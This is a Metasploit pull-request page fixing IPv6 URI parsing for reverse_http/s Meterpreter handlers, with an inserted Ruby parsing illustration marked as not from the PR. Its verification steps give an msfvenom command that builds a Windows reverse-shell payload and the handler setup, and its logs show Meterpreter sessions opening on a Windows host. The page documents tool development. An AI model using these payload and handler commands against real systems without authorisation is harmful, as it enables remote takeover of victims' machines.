
Fix parse IPv6 address in reverse_http #11892

Merged
merged 1 commit into from May 31, 2019

@ssyy201506
Contributor

commented May 29, 2019

This PR fixes an error where a Meterpreter session is not established when an IPv6 address is set as LHOST of reverse_http.

Verification

  • msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_http LHOST=<ipv6 address> LPORT=<lport> -f psh-cmd > payload.bat
  • Start msfconsole
  • use exploit/multi/handler
  • set PAYLOAD windows/meterpreter/reverse_http
  • set LHOST <ipv6 address>
  • set LPORT <lport>
  • (set ReverseListenerBindAddress <ipv6 address%scope id>) --- if LHOST is link local
  • set ExitOnSession false
  • run -j
  • execute payload
  • Verify that the output does not contain any error messages

Before fix

root@host64msf:~# dpkg -l | grep metasploit
ii  metasploit-framework                       5.0.25+20190526102506~1rapid7-1              amd64        The full stack of metasploit-framework
msf5 > version
Framework: 5.0.25-dev-
Console  : 5.0.25-dev-

msf5 > use multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST fe80::a00:27ff:fef2:e1b0
LHOST => fe80::a00:27ff:fef2:e1b0
msf5 exploit(multi/handler) > set ReverseListenerBindAddress fe80::a00:27ff:fef2:e1b0%eth1
ReverseListenerBindAddress => fe80::a00:27ff:fef2:e1b0%eth1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf5 exploit(multi/handler) > 
[*] Started HTTP reverse handler on http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080
msf5 exploit(multi/handler) > 
 
 ::
 ::
 (execute payload)
 ::

[-] http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: mzm9frxj) Exception handling request: bad URI(is not URI?): http://[fe80:8080/Cq6fKkmIs7QwVzFWbLukRAxpDbdBIcOwf1yFofG6K6XQlGiuTq6XS6thezl6JomFTiKeBXXretnku/

After fix

 ::
 ::
 (execute payload)
 ::
[*] http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: wwpuwthm) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (fe80::a00:27ff:fef2:e1b0%eth1:8080 -> fe80::d45b:27a1:9b93:480%eth1:49159) at 2019-05-28 10:28:32 +0900

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7-001
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : ja_JP
Domain          : LOCALDOMAIN
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > 

PAYLOAD=windows/meterpreter/reverse_http, LPORT=80:

 ::
 ::
 (execute payload)
 ::
[*] http://[fe80::a00:27ff:fef2:e1b0%eth1]:80 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: sxbx1dtl) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (fe80::a00:27ff:fef2:e1b0%eth1:80 -> fe80::d45b:27a1:9b93:480%eth1:49164) at 2019-05-28 10:34:12 +0900
 ::

PAYLOAD=windows/meterpreter/reverse_https, LPORT=8443:

 ::
 ::
 (execute payload)
 ::
[*] https://[fe80::a00:27ff:fef2:e1b0%eth1]:8443 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: jqqxx1ys) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 3 opened (fe80::a00:27ff:fef2:e1b0%eth1:8443 -> fe80::d45b:27a1:9b93:480%eth1:49168) at 2019-05-28 10:35:45 +0900
 ::

PAYLOAD=windows/meterpreter/reverse_https, LPORT=443:

 ::
 ::
 (execute payload)
 ::
[*] https://[fe80::a00:27ff:fef2:e1b0%eth1]:443 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: e4mnnw6f) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 4 opened (fe80::a00:27ff:fef2:e1b0%eth1:443 -> fe80::d45b:27a1:9b93:480%eth1:49172) at 2019-05-28 10:37:06 +0900
 ::
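The `bad URI(is not URI?): http://[fe80:8080/...` line in the "Before fix" log is the signature of a host:port split that does not know about bracketed IPv6 literals: the first hextet of the address becomes the host and the real port is glued onto it. The Ruby below is an added illustration, not code from this PR or from Metasploit, that reproduces that shape with a deliberately naive splitter and then rebuilds the URL with a parser that honours the RFC 3986 bracket form and a link-local zone id. All names (`naive_build_url`, `HOST_PORT_RE`, `parse_host_header`, `build_url`, `SAMPLE_HOSTS`) are hypothetical, and the sample Host headers are constructed (the link-local one reuses the address from the log above).

```ruby
require 'ipaddr'
require 'uri'

# Constructed sample Host header values (not taken from the PR's diff).
SAMPLE_HOSTS = {
  ipv6_linklocal: '[fe80::a00:27ff:fef2:e1b0%eth1]:8080',
  ipv6_global:    '[2001:db8::10]:443',
  ipv4:           '192.0.2.5:8080',
  name_no_port:   'listener.example'
}.freeze

# Hypothetical buggy splitter: everything before the first ':' is the host,
# everything after the last ':' is the port. Fine for IPv4 and names, but an
# IPv6 literal is cut after its first hextet, which gives a URL of the shape
# seen in the "Before fix" log ("http://[fe80:8080/...").
def naive_build_url(host_header, path, scheme: 'http')
  parts = host_header.split(':')
  "#{scheme}://#{parts.first}:#{parts.last}#{path}"
end

# host[:port] grammar from RFC 3986 section 3.2.2: an IP-literal is enclosed in
# brackets, so a ':' inside the brackets never separates the port.
HOST_PORT_RE = /\A(?:\[(?<v6>[^\]]+)\]|(?<name>[^:\[\]]+))(?::(?<port>\d{1,5}))?\z/

# Returns { host:, zone:, port:, ipv6: }; raises ArgumentError on malformed input.
def parse_host_header(host_header, default_port)
  m = HOST_PORT_RE.match(host_header.to_s.strip)
  raise ArgumentError, "malformed Host header: #{host_header.inspect}" unless m

  port = m[:port] ? Integer(m[:port], 10) : default_port
  raise ArgumentError, "port out of range: #{port}" unless (1..65_535).cover?(port)

  if m[:v6]
    # Split off a link-local zone id ("%eth1") before validating the literal;
    # IPAddr raises IPAddr::InvalidAddressError (an ArgumentError) for junk.
    addr, zone = m[:v6].split('%', 2)
    raise ArgumentError, "not an IPv6 literal: #{addr}" unless IPAddr.new(addr).ipv6?
    { host: addr, zone: zone, port: port, ipv6: true }
  else
    { host: m[:name], zone: nil, port: port, ipv6: false }
  end
end

# Rebuilds an absolute URL, keeping IPv6 literals bracketed and their zone id
# attached (the form the handler prints in the log above).
def build_url(host_header, path, scheme: 'http')
  info = parse_host_header(host_header, scheme == 'https' ? 443 : 80)
  host = info[:host]
  host += "%#{info[:zone]}" if info[:zone]
  host = "[#{host}]" if info[:ipv6]
  url = "#{scheme}://#{host}:#{info[:port]}#{path}"
  # URI.parse rejects an unencoded zone id, so check the structure with the
  # zone id stripped; anything still malformed raises URI::InvalidURIError.
  URI.parse(info[:zone] ? url.sub("%#{info[:zone]}]", ']') : url)
  url
end

if __FILE__ == $PROGRAM_NAME
  path = '/stage/'
  puts "naive: #{naive_build_url(SAMPLE_HOSTS[:ipv6_linklocal], path)}"
  SAMPLE_HOSTS.each_value { |h| puts "fixed: #{build_url(h, path)}" }
end
```

Run as a script it prints the broken `http://[fe80:8080/stage/` form first and the correctly bracketed URLs after it. The zone id is kept raw because that is what the listener logs; a strict RFC 6874 consumer would expect it percent-encoded as `%25eth1`, which is why the validation step strips it before handing the string to `URI.parse`.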

@busterb busterb self-assigned this May 31, 2019

@busterb

Member

commented May 31, 2019

LGTM, thanks @ssyy201506

@busterb busterb merged commit ecda8d8 into rapid7:master May 31, 2019

3 checks passed:

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request May 31, 2019

msjenkins-r7 added a commit that referenced this pull request May 31, 2019

@busterb

Member

commented May 31, 2019

Release Notes

URI parsing now works properly with reverse_http/s payloads when you specify IPv6 addresses.

@ssyy201506

Contributor Author

commented Jun 1, 2019

Thanks, @busterb

@ssyy201506 ssyy201506 deleted the ssyy201506:fix_ipv6_uri_parse branch Jun 1, 2019

@tdoan-r7 tdoan-r7 added the rn-fix label Jun 11, 2019
